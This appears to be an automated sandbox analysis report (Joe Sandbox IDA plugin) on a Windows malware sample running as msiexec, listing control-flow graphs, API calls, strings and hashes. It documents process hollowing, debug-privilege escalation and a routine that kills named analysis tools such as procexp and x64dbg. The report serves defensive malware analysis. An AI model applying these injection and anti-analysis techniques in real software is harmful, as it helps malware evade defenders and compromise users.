                                                                                                                                                                  • Instruction Fuzzy Hash: 7DD0C921E38D82D1E794AB26E889729A2A0FBC4B45F808135E68941565CE3CC09E8B00

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 332 7ff7179d2048-7ff7179d20c2 GetModuleFileNameW 333 7ff7179d20c4 332->333 334 7ff7179d20c9-7ff7179d2105 332->334 335 7ff7179d296d-7ff7179d2975 333->335 336 7ff7179d211d-7ff7179d2139 call 7ff7179d1f88 334->336 337 7ff7179d2107-7ff7179d210f 334->337 345 7ff7179d217c-7ff7179d2186 336->345 338 7ff7179d2111-7ff7179d2119 337->338 339 7ff7179d213b-7ff7179d2157 call 7ff7179d1fc8 337->339 342 7ff7179d211b-7ff7179d2177 338->342 343 7ff7179d2159-7ff7179d2175 call 7ff7179d2008 338->343 339->345 342->335 343->345 350 7ff7179d218d-7ff7179d21e1 CreateProcessW 345->350 351 7ff7179d2188 345->351 352 7ff7179d21e3 350->352 353 7ff7179d21e8-7ff7179d2228 350->353 351->335 352->335 355 7ff7179d222f-7ff7179d224b GetFileSize 353->355 356 7ff7179d222a 353->356 357 7ff7179d224d-7ff7179d2255 355->357 358 7ff7179d2257-7ff7179d2262 CloseHandle 355->358 356->335 357->358 359 7ff7179d2267-7ff7179d228f VirtualAlloc 357->359 358->335 360 7ff7179d22a1-7ff7179d22cc ReadFile 359->360 361 7ff7179d2291-7ff7179d229c CloseHandle 359->361 362 7ff7179d22f1-7ff7179d233f CloseHandle GetThreadContext 360->362 363 7ff7179d22ce-7ff7179d22ec VirtualFree CloseHandle 360->363 361->335 364 7ff7179d2341-7ff7179d2354 VirtualFree 362->364 365 7ff7179d2359-7ff7179d23de ReadProcessMemory GetModuleHandleA GetProcAddress 362->365 363->335 364->335 367 7ff7179d23e0-7ff7179d23f3 VirtualFree 365->367 368 7ff7179d23f8-7ff7179d2461 VirtualAllocEx 365->368 367->335 369 7ff7179d2463-7ff7179d2476 VirtualFree 368->369 370 7ff7179d247b-7ff7179d24af WriteProcessMemory 368->370 369->335 371 7ff7179d24b1-7ff7179d24c4 VirtualFree 370->371 372 7ff7179d24c9-7ff7179d24d4 370->372 371->335 373 7ff7179d24e6-7ff7179d24f9 372->373 374 7ff7179d24ff-7ff7179d2588 WriteProcessMemory 373->374 375 7ff7179d25a7-7ff7179d25ee 373->375 376 7ff7179d25a2 374->376 377 7ff7179d258a-7ff7179d259d VirtualFree 374->377 378 7ff7179d2600-7ff7179d2613 375->378 376->373 377->335 380 7ff7179d2898-7ff7179d291c WriteProcessMemory SetThreadContext 378->380 381 7ff7179d2619-7ff7179d2668 RtlCompareMemory 378->381 382 7ff7179d2933-7ff7179d2943 ResumeThread 380->382 383 7ff7179d291e-7ff7179d2931 VirtualFree 380->383 384 7ff7179d266c-7ff7179d2695 381->384 385 7ff7179d266a 381->385 387 7ff7179d2945-7ff7179d2958 VirtualFree 382->387 388 7ff7179d295a-7ff7179d2967 VirtualFree 382->388 383->335 389 7ff7179d26a0-7ff7179d26ae 384->389 385->378 387->335 388->335 390 7ff7179d2893 389->390 391 7ff7179d26b4-7ff7179d273f 389->391 390->380 392 7ff7179d2751-7ff7179d275f 391->392 393 7ff7179d2765-7ff7179d2798 392->393 394 7ff7179d288e 392->394 395 7ff7179d279c-7ff7179d286f ReadProcessMemory WriteProcessMemory 393->395 396 7ff7179d279a 393->396 394->389 398 7ff7179d2871-7ff7179d2884 VirtualFree 395->398 399 7ff7179d2889 395->399 396->392 398->335 399->394
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                  • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                  • API String ID: 514040917-3001742581
                                                                                                                                                                  • Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                  • Instruction ID: 84c1f5bfe8c752708116ce3524f9e2f5f0110caa14c9c5639ead3a28f315b418
                                                                                                                                                                  • Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                  • Instruction Fuzzy Hash: AE32DC3260CBC286D774DB15E8987AAB3A1F7C8BA5F404135DA8D83B59DF7CD4498B10

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                                                  • API String ID: 2379135442-2896544425
                                                                                                                                                                  • Opcode ID: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                  • Instruction ID: 6055a92524635dab32482a8e28672e73c1aa1d261a18bbef9e090ae157b38ff8
                                                                                                                                                                  • Opcode Fuzzy Hash: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                  • Instruction Fuzzy Hash: FE416A32618A8286E350DB51F48836EF7A0FB807A4F904134EA8947AA9DFBDD44DCF10
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 4073123320-2766056989
                                                                                                                                                                  • Opcode ID: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                  • Instruction ID: 23ed6c52531b8770c9a8e885532bea41c66a11da3f0b1b5e57a0cf8de79caf0b
                                                                                                                                                                  • Opcode Fuzzy Hash: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                  • Instruction Fuzzy Hash: 0F41F23260CB8686E770DB15F49836AF7A0F789BA4F504025EACC83B59DF7DD4498B50

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF7179D1D19
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                  • API String ID: 2307068205-2771526726
                                                                                                                                                                  • Opcode ID: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                  • Instruction ID: 5743e3d696b70e7467e1b1665e0b4d7271ddf9f5c80587afdff0b8da5bc9e4c2
                                                                                                                                                                  • Opcode Fuzzy Hash: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                  • Instruction Fuzzy Hash: A771F676618A8282E750EB54F49836EF7A0FBC47A4F901135FA8E43A69CF7CD44D8B10

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocateCloseFileHandleProcessSize
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1391523307-0
                                                                                                                                                                  • Opcode ID: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                  • Instruction ID: 05695ffc522ee71a45d2b02f721e33c543f1d90d1fb13df5d6cc104e99077a0f
                                                                                                                                                                  • Opcode Fuzzy Hash: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                  • Instruction Fuzzy Hash: 2281BD36608F8286EA50DB56F48436EE7A0FBC9BA1F504535EA8D83769DF7CD0498B10

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF7179D45C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3117), ref: 00007FF7179D4654
                                                                                                                                                                    • Part of subcall function 00007FF7179D3C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF7179D3C3C
                                                                                                                                                                    • Part of subcall function 00007FF7179D3E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7179D3E37
                                                                                                                                                                    • Part of subcall function 00007FF7179D3E24: Process32FirstW.KERNEL32 ref: 00007FF7179D3E6A
                                                                                                                                                                    • Part of subcall function 00007FF7179D3E24: CloseHandle.KERNEL32 ref: 00007FF7179D3E7C
                                                                                                                                                                    • Part of subcall function 00007FF7179D3E24: wcscmp.MSVCRT ref: 00007FF7179D3E91
                                                                                                                                                                    • Part of subcall function 00007FF7179D3E24: OpenProcess.KERNEL32 ref: 00007FF7179D3EA7
                                                                                                                                                                    • Part of subcall function 00007FF7179D3E24: TerminateProcess.KERNEL32 ref: 00007FF7179D3ECA
                                                                                                                                                                    • Part of subcall function 00007FF7179D3E24: CloseHandle.KERNEL32 ref: 00007FF7179D3ED8
                                                                                                                                                                    • Part of subcall function 00007FF7179D3E24: Process32NextW.KERNEL32 ref: 00007FF7179D3EEB
                                                                                                                                                                    • Part of subcall function 00007FF7179D3E24: CloseHandle.KERNEL32 ref: 00007FF7179D3EFD
                                                                                                                                                                  • Sleep.KERNEL32 ref: 00007FF7179D31C6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$ProcessProcess32$CreateDeleteFirstNextOpenSleepSnapshotTerminateToolhelp32wcscmp
                                                                                                                                                                  • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                  • API String ID: 4011447834-928700279
                                                                                                                                                                  • Opcode ID: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                  • Instruction ID: 71538bb510e44a0e941b4f024f392962346737fa5a14ade19f1ba244ae1e7077
                                                                                                                                                                  • Opcode Fuzzy Hash: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                  • Instruction Fuzzy Hash: 38218024A18D4391EA04FB65E8DD1B8E2A1AF957B5FC04231E41D422E7DE6CE90F8670

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                  • String ID: rbNSpGEsyb
                                                                                                                                                                  • API String ID: 299056699-189039185
                                                                                                                                                                  • Opcode ID: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                  • Instruction ID: dbfec0dbbac1783c563a2c7c41f1b8a1b04dd1fa50a59102131ecd554257da7b
                                                                                                                                                                  • Opcode Fuzzy Hash: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                  • Instruction Fuzzy Hash: 9F017D2690CE4382E724AB11F89826DE760FB9CBB9F840531D94E42665CF7CD58E8620

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF7179D3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7179D3784
                                                                                                                                                                    • Part of subcall function 00007FF7179D3744: GetVolumeInformationW.KERNEL32 ref: 00007FF7179D3801
                                                                                                                                                                    • Part of subcall function 00007FF7179D3744: wsprintfW.USER32 ref: 00007FF7179D38A2
                                                                                                                                                                  • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D390D
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D3922
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D3935
                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D3945
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D396D
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D3980
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D3995
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrcat$Directory$CreateFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                  • API String ID: 943468954-4119554291
                                                                                                                                                                  • Opcode ID: 4d26158de2af8381748b2d04efe2df67fec403f4766650bccdbd64d4b22479f1
                                                                                                                                                                  • Instruction ID: d38a78bf61eb53d0078a6985e38b4bf526e3c3ce2f5b91d2f4b215360bab7f47
                                                                                                                                                                  • Opcode Fuzzy Hash: 4d26158de2af8381748b2d04efe2df67fec403f4766650bccdbd64d4b22479f1
                                                                                                                                                                  • Instruction Fuzzy Hash: 43111F21628DC796DB60AB25F89876EE361FBC4B90F805031DA4E43A2ADE7CD40EC750

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1083639309-0
                                                                                                                                                                  • Opcode ID: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                  • Instruction ID: 71c836599dd00616232082b02abfd8766400cfbbbc4eb33f1114d6730a46c0c1
                                                                                                                                                                  • Opcode Fuzzy Hash: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C21AA31A0CDC782E770AB15F88C36AE260FBC4765F804235D55E425A9DF6DD44ECB20
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 299056699-0
                                                                                                                                                                  • Opcode ID: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                  • Instruction ID: ea7bdfc94c18b19bfddeb21a53921d41fd5dddc0644830ccca2c45afbd5cbe79
                                                                                                                                                                  • Opcode Fuzzy Hash: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                  • Instruction Fuzzy Hash: 2401DE2691CE8382E720AB21F88C26DE370FBD8B69FC00535E98E43675CF6CD54E8610
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                  • String ID: Unknown
                                                                                                                                                                  • API String ID: 4220601557-1654365787
                                                                                                                                                                  • Opcode ID: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                  • Instruction ID: 0ecc07f0e93c19f1d36d76d610fa0d9e728b0d8334172b4f4effe470eba9938b
                                                                                                                                                                  • Opcode Fuzzy Hash: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                  • Instruction Fuzzy Hash: CC31C77661CEC185D770AB19E4D87AAA3A0F788750F800125DA8D83B68DF3CD159CB10
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2850635065-0
                                                                                                                                                                  • Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                  • Instruction ID: 8e4b27fc9651e1eac78e040a419806bc51a45551b63993e82db8b907013a6b83
                                                                                                                                                                  • Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                  • Instruction Fuzzy Hash: 1711AC71A0CA8782E770AF11F48C3AAE3A0FB84764F904235DA9D426A9DF7DD50DDB10
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
